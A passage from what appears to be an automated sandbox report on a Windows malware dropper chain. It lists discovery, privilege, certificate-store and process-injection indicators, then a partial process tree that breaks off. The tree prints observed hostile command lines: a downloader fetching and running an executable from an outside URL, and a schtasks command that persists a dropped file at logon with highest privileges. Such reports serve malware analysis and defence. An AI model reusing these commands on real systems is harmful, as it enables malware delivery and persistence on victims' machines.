C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe -
resource yara_rule behavioral1/memory/756-589-0x000007FEED960000-0x000007FEEDDC5000-memory.dmp upx behavioral1/memory/1700-661-0x000007FEEBD60000-0x000007FEEC1C5000-memory.dmp upx behavioral1/memory/2924-821-0x000007FEEB8F0000-0x000007FEEBD55000-memory.dmp upx behavioral1/files/0x000400000001d71a-830.dat upx behavioral1/files/0x000400000001d718-829.dat upx behavioral1/files/0x000400000001d716-828.dat upx behavioral1/files/0x000400000001d7b2-838.dat upx behavioral1/files/0x000400000001d75c-837.dat upx behavioral1/files/0x000400000001d754-836.dat upx behavioral1/files/0x000400000001d72b-835.dat upx behavioral1/files/0x000400000001d722-834.dat upx behavioral1/files/0x000400000001d71e-833.dat upx behavioral1/files/0x000400000001d9da-880.dat upx behavioral1/files/0x000400000001d9d7-879.dat upx behavioral1/files/0x000400000001d9dc-881.dat upx behavioral1/files/0x000400000001d9de-882.dat upx behavioral1/files/0x000400000001d9ea-888.dat upx behavioral1/files/0x000400000001d9e6-886.dat upx behavioral1/files/0x000400000001d9e4-885.dat upx behavioral1/memory/2284-889-0x000007FEEB480000-0x000007FEEB8E5000-memory.dmp upx behavioral1/memory/1500-955-0x000007FEEB010000-0x000007FEEB475000-memory.dmp upx behavioral1/memory/2452-1021-0x000007FEEABA0000-0x000007FEEB005000-memory.dmp upx behavioral1/memory/1532-1087-0x000007FEEA730000-0x000007FEEAB95000-memory.dmp upx behavioral1/memory/2020-1153-0x000007FEEA2C0000-0x000007FEEA725000-memory.dmp upx behavioral1/memory/1960-1272-0x000007FEE9E50000-0x000007FEEA2B5000-memory.dmp upx behavioral1/memory/2500-1339-0x000007FEE98E0000-0x000007FEE9D45000-memory.dmp upx behavioral1/memory/2840-1406-0x000007FEE9370000-0x000007FEE97D5000-memory.dmp upx behavioral1/memory/2612-1474-0x000007FEE8CD0000-0x000007FEE9135000-memory.dmp upx behavioral1/memory/2216-1549-0x000007FEE8860000-0x000007FEE8CC5000-memory.dmp upx behavioral1/memory/1772-1617-0x000007FEE82F0000-0x000007FEE8755000-memory.dmp upx behavioral1/memory/2036-1684-0x000007FEE7E80000-0x000007FEE82E5000-memory.dmp upx behavioral1/memory/3068-1751-0x000007FEE7A10000-0x000007FEE7E75000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client-built.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WEBDOWN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bugs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whats-new.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language roIrMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jeditor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qNVQKFyM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jeditor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language temp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4992 Process not Found 1360 PING.EXE 1724 PING.EXE 444 PING.EXE 848 PING.EXE 3096 PING.EXE 4740 PING.EXE 2608 PING.EXE 2328 PING.EXE 1616 PING.EXE 2560 PING.EXE 4848 PING.EXE -
Delays execution with timeout.exe 64 IoCs
pid Process 2492 timeout.exe 348 timeout.exe 4008 timeout.exe 2000 timeout.exe 1984 timeout.exe 916 timeout.exe 3668 timeout.exe 4752 timeout.exe 4948 timeout.exe 2792 timeout.exe 4036 timeout.exe 4028 timeout.exe 3920 timeout.exe 3160 timeout.exe 4872 Process not Found 2584 timeout.exe 3508 timeout.exe 3136 timeout.exe 2056 timeout.exe 2084 timeout.exe 444 timeout.exe 3120 timeout.exe 2932 timeout.exe 2804 timeout.exe 2480 timeout.exe 1912 timeout.exe 2864 timeout.exe 3244 timeout.exe 4724 timeout.exe 4880 timeout.exe 1012 timeout.exe 3288 timeout.exe 2028 timeout.exe 3088 timeout.exe 1896 timeout.exe 4064 timeout.exe 3612 timeout.exe 3524 timeout.exe 3704 timeout.exe 3540 timeout.exe 2544 timeout.exe 3228 timeout.exe 2800 timeout.exe 2692 timeout.exe 1300 timeout.exe 2676 timeout.exe 2952 timeout.exe 4500 timeout.exe 4012 timeout.exe 2724 timeout.exe 2516 timeout.exe 2908 timeout.exe 2516 timeout.exe 3840 timeout.exe 3280 timeout.exe 1444 timeout.exe 336 timeout.exe 1980 timeout.exe 4944 timeout.exe 3212 timeout.exe 2952 timeout.exe 2576 timeout.exe 4664 timeout.exe 2372 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Modifies system certificate store 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ._cache_Synaptics.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ._cache_Synaptics.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ._cache_Synaptics.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ._cache_Synaptics.exe -
Runs ping.exe 1 TTPs 12 IoCs
pid Process 1360 PING.EXE 1724 PING.EXE 2560 PING.EXE 848 PING.EXE 3096 PING.EXE 4848 PING.EXE 4992 Process not Found 2608 PING.EXE 2328 PING.EXE 1616 PING.EXE 444 PING.EXE 4740 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4032 schtasks.exe 2460 schtasks.exe 4704 schtasks.exe 4312 schtasks.exe 1608 schtasks.exe 2484 schtasks.exe 2364 schtasks.exe 2988 schtasks.exe 2268 schtasks.exe 1324 schtasks.exe 4220 schtasks.exe 2232 schtasks.exe 2696 schtasks.exe 4312 schtasks.exe 264 schtasks.exe 2108 schtasks.exe 700 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1556 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2908 Discord2.exe 2908 Discord2.exe 2908 Discord2.exe 1860 temp.exe 1860 temp.exe 1860 temp.exe 2780 svchost.exe 2780 svchost.exe 3784 powershell.exe 4164 powershell.exe 4416 powershell.exe 4288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 552 ._cache_4363463463464363463463463.exe Token: SeDebugPrivilege 2596 ._cache_Synaptics.exe Token: SeDebugPrivilege 2908 Discord2.exe Token: SeDebugPrivilege 2404 Discord.exe Token: SeDebugPrivilege 2404 Discord.exe Token: SeDebugPrivilege 1908 skibidi.exe Token: SeDebugPrivilege 2792 Client.exe Token: SeDebugPrivilege 1860 temp.exe Token: SeDebugPrivilege 2316 roIrMC.exe Token: SeDebugPrivilege 2376 Client.exe Token: SeDebugPrivilege 1464 Client.exe Token: SeDebugPrivilege 2356 Client-built.exe Token: SeDebugPrivilege 2780 svchost.exe Token: SeDebugPrivilege 1412 WindowsDataUpdater.exe Token: SeDebugPrivilege 688 WindowsDataUpdater.exe Token: SeDebugPrivilege 2036 Client.exe Token: SeDebugPrivilege 1608 WindowsDataUpdater.exe Token: SeDebugPrivilege 2760 WindowsDataUpdater.exe Token: SeDebugPrivilege 1052 WindowsDataUpdater.exe Token: SeDebugPrivilege 3000 WindowsDataUpdater.exe Token: SeDebugPrivilege 1772 WindowsDataUpdater.exe Token: SeDebugPrivilege 2492 WindowsDataUpdater.exe Token: SeDebugPrivilege 2232 WindowsDataUpdater.exe Token: SeDebugPrivilege 1684 WindowsDataUpdater.exe Token: SeDebugPrivilege 3000 WindowsDataUpdater.exe Token: SeDebugPrivilege 932 WindowsDataUpdater.exe Token: SeDebugPrivilege 1472 Client.exe Token: SeDebugPrivilege 1924 WindowsDataUpdater.exe Token: SeDebugPrivilege 1636 WindowsDataUpdater.exe Token: SeDebugPrivilege 2628 WindowsDataUpdater.exe Token: SeDebugPrivilege 1912 WindowsDataUpdater.exe Token: SeDebugPrivilege 2492 WindowsDataUpdater.exe Token: SeDebugPrivilege 2556 WindowsDataUpdater.exe Token: SeDebugPrivilege 2292 WindowsDataUpdater.exe Token: SeDebugPrivilege 900 WindowsDataUpdater.exe Token: SeDebugPrivilege 1616 WindowsDataUpdater.exe Token: SeDebugPrivilege 1512 WindowsDataUpdater.exe Token: SeDebugPrivilege 1932 WindowsDataUpdater.exe Token: SeDebugPrivilege 2824 Client.exe Token: SeDebugPrivilege 1536 WindowsDataUpdater.exe Token: SeDebugPrivilege 700 WindowsDataUpdater.exe Token: SeDebugPrivilege 2932 WindowsDataUpdater.exe Token: SeDebugPrivilege 3360 WindowsDataUpdater.exe Token: SeDebugPrivilege 3776 WindowsDataUpdater.exe Token: SeDebugPrivilege 3004 WindowsDataUpdater.exe Token: SeDebugPrivilege 3480 WindowsDataUpdater.exe Token: SeDebugPrivilege 3936 WindowsDataUpdater.exe Token: SeDebugPrivilege 3196 WindowsDataUpdater.exe Token: SeDebugPrivilege 2144 WindowsDataUpdater.exe Token: SeDebugPrivilege 1624 Client.exe Token: SeDebugPrivilege 3156 WindowsDataUpdater.exe Token: SeDebugPrivilege 4088 WindowsDataUpdater.exe Token: SeDebugPrivilege 3040 WindowsDataUpdater.exe Token: SeDebugPrivilege 3904 WindowsDataUpdater.exe Token: SeDebugPrivilege 3896 WindowsDataUpdater.exe Token: SeDebugPrivilege 3616 WindowsDataUpdater.exe Token: SeDebugPrivilege 1624 WindowsDataUpdater.exe Token: SeDebugPrivilege 3284 WindowsDataUpdater.exe Token: SeDebugPrivilege 3280 WindowsDataUpdater.exe Token: SeDebugPrivilege 3328 WindowsDataUpdater.exe Token: SeDebugPrivilege 1880 Client.exe Token: SeDebugPrivilege 2936 WindowsDataUpdater.exe Token: SeDebugPrivilege 2408 WindowsDataUpdater.exe Token: SeDebugPrivilege 3608 WindowsDataUpdater.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1556 EXCEL.EXE 1412 WindowsDataUpdater.exe 3304 qNVQKFyM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2760 wrote to memory of 552 2760 4363463463464363463463463.exe 31 PID 2760 wrote to memory of 552 2760 4363463463464363463463463.exe 31 PID 2760 wrote to memory of 552 2760 4363463463464363463463463.exe 31 PID 2760 wrote to memory of 552 2760 4363463463464363463463463.exe 31 PID 2760 wrote to memory of 2656 2760 4363463463464363463463463.exe 33 PID 2760 wrote to memory of 2656 2760 4363463463464363463463463.exe 33 PID 2760 wrote to memory of 2656 2760 4363463463464363463463463.exe 33 PID 2760 wrote to memory of 2656 2760 4363463463464363463463463.exe 33 PID 2656 wrote to memory of 2596 2656 Synaptics.exe 34 PID 2656 wrote to memory of 2596 2656 Synaptics.exe 34 PID 2656 wrote to memory of 2596 2656 Synaptics.exe 34 PID 2656 wrote to memory of 2596 2656 Synaptics.exe 34 PID 2596 wrote to memory of 2908 2596 ._cache_Synaptics.exe 38 PID 2596 wrote to memory of 2908 2596 ._cache_Synaptics.exe 38 PID 2596 wrote to memory of 2908 2596 ._cache_Synaptics.exe 38 PID 2596 wrote to memory of 2908 2596 ._cache_Synaptics.exe 38 PID 2908 wrote to memory of 2972 2908 Discord2.exe 40 PID 2908 wrote to memory of 2972 2908 Discord2.exe 40 PID 2908 wrote to memory of 2972 2908 Discord2.exe 40 PID 2908 wrote to memory of 2972 2908 Discord2.exe 40 PID 2908 wrote to memory of 2196 2908 Discord2.exe 42 PID 2908 wrote to memory of 2196 2908 Discord2.exe 42 PID 2908 wrote to memory of 2196 2908 Discord2.exe 42 PID 2908 wrote to memory of 2196 2908 Discord2.exe 42 PID 2972 wrote to memory of 2232 2972 cmd.exe 44 PID 2972 wrote to memory of 2232 2972 cmd.exe 44 PID 2972 wrote to memory of 2232 2972 cmd.exe 44 PID 2972 wrote to memory of 2232 2972 cmd.exe 44 PID 2196 wrote to memory of 1896 2196 cmd.exe 45 PID 2196 wrote to memory of 1896 2196 cmd.exe 45 PID 2196 wrote to memory of 1896 2196 cmd.exe 45 PID 2196 wrote to memory of 1896 2196 cmd.exe 45 PID 2196 wrote to memory of 2404 2196 cmd.exe 46 PID 2196 wrote to memory of 2404 2196 cmd.exe 46 PID 2196 wrote to memory of 2404 2196 cmd.exe 46 PID 2196 wrote to memory of 2404 2196 cmd.exe 46 PID 552 wrote to memory of 2624 552 ._cache_4363463463464363463463463.exe 47 PID 552 wrote to memory of 2624 552 ._cache_4363463463464363463463463.exe 47 PID 552 wrote to memory of 2624 552 ._cache_4363463463464363463463463.exe 47 PID 552 wrote to memory of 2624 552 ._cache_4363463463464363463463463.exe 47 PID 2596 wrote to memory of 1908 2596 ._cache_Synaptics.exe 48 PID 2596 wrote to memory of 1908 2596 ._cache_Synaptics.exe 48 PID 2596 wrote to memory of 1908 2596 ._cache_Synaptics.exe 48 PID 2596 wrote to memory of 1908 2596 ._cache_Synaptics.exe 48 PID 552 wrote to memory of 1212 552 ._cache_4363463463464363463463463.exe 49 PID 552 wrote to memory of 1212 552 ._cache_4363463463464363463463463.exe 49 PID 552 wrote to memory of 1212 552 ._cache_4363463463464363463463463.exe 49 PID 552 wrote to memory of 1212 552 ._cache_4363463463464363463463463.exe 49 PID 552 wrote to memory of 1860 552 ._cache_4363463463464363463463463.exe 50 PID 552 wrote to memory of 1860 552 ._cache_4363463463464363463463463.exe 50 PID 552 wrote to memory of 1860 552 ._cache_4363463463464363463463463.exe 50 PID 552 wrote to memory of 1860 552 ._cache_4363463463464363463463463.exe 50 PID 1908 wrote to memory of 264 1908 skibidi.exe 51 PID 1908 wrote to memory of 264 1908 skibidi.exe 51 PID 1908 wrote to memory of 264 1908 skibidi.exe 51 PID 1908 wrote to memory of 2792 1908 skibidi.exe 53 PID 1908 wrote to memory of 2792 1908 skibidi.exe 53 PID 1908 wrote to memory of 2792 1908 skibidi.exe 53 PID 2792 wrote to memory of 2696 2792 Client.exe 54 PID 2792 wrote to memory of 2696 2792 Client.exe 54 PID 2792 wrote to memory of 2696 2792 Client.exe 54 PID 2792 wrote to memory of 2808 2792 Client.exe 56 PID 2792 wrote to memory of 2808 2792 Client.exe 56 PID 2792 wrote to memory of 2808 2792 Client.exe 56 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:596
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding2⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"2⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"3⤵
- Executes dropped EXE
PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE"C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exeC:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\temp.exe"C:\Users\Admin\AppData\Local\Temp\Files\temp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "roIrMC" /tr '"C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:2156 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "roIrMC" /tr '"C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp757E.tmp.bat""4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:776 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"5⤵
- Executes dropped EXE
